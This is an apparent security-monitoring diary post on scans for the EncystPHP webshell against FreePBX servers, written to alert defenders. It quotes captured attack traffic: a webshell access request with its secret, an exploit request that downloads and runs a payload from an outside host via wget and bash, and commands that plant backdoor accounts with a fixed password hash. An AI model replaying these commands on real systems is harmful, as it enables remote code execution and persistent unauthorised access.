Scans for EncystPHP Webshell, (Mon, Apr 13th)

Last week, I wrote about attackers scanning for various webshells, hoping to find some that do not require authentication or others that use well-known credentials. But some attackers are paying attention and are deploying webshells with more difficult-to-guess credentials. Today, I noticed some scans for what appears to be the EncystPHP web shell. Fortinet wrote about this webshell back in January. It appears to be a favorite among attackers compromising vulnerable FreePBX systems. The requests I observed look like: GET /admin/modules/phones/ajax.php?md5=cf710203400b8c466e6dfcafcf36a411 Host: [victim ip address]:8000 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive This URL matches what Fortinet reported back in January. The parameter name md5 is a bit misleading. The webshell will just compare the string. The parameter is not necessarily the MD5 hash of a specific password ; any string will work as long as it matches the hard-coded string in the webshell. The string above has the correct length for an MD5 hash, but I wasn't able to find it in common MD5 hash databases. It is very possible that only a few different values are used across different attack campaigns. Many attackers may just copy/paste the code, including this access secret. Currently, these probes originate from %%ip:160.119.76.250%%, an IP address located in the Netherlands. The IP address hosts an unconfigured web server. The same IP address is also probing for various FreePBX vulnerabilities, for example: /restapps/applications.php?linestate=$$LINESTATE$$ user=100 Context: ext-local Action: Originate Channel: Local/DONTCALL@macro-dial Application: system data: wget http://45.95.147.178/k.php -O /tmp/k;bash /tmp/ k This request also matches the scans reported by Fortinet, and it returns the EncystPHP webshell. This version is also adding the following backdoor accounts: echo 'root:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'hima:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'asterisk:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'sugarmaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'spamfilter:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'asteriskuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'supports:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'freepbxuser:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'supermaint:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true echo 'juba:$1$nRz1Cbtk$6DnGs37n.OpPcgejUfp9p.' | chpasswd -e 2 /dev/null || true If you are using FreePBX, you may want to check for these accounts just to make sure. -- Johannes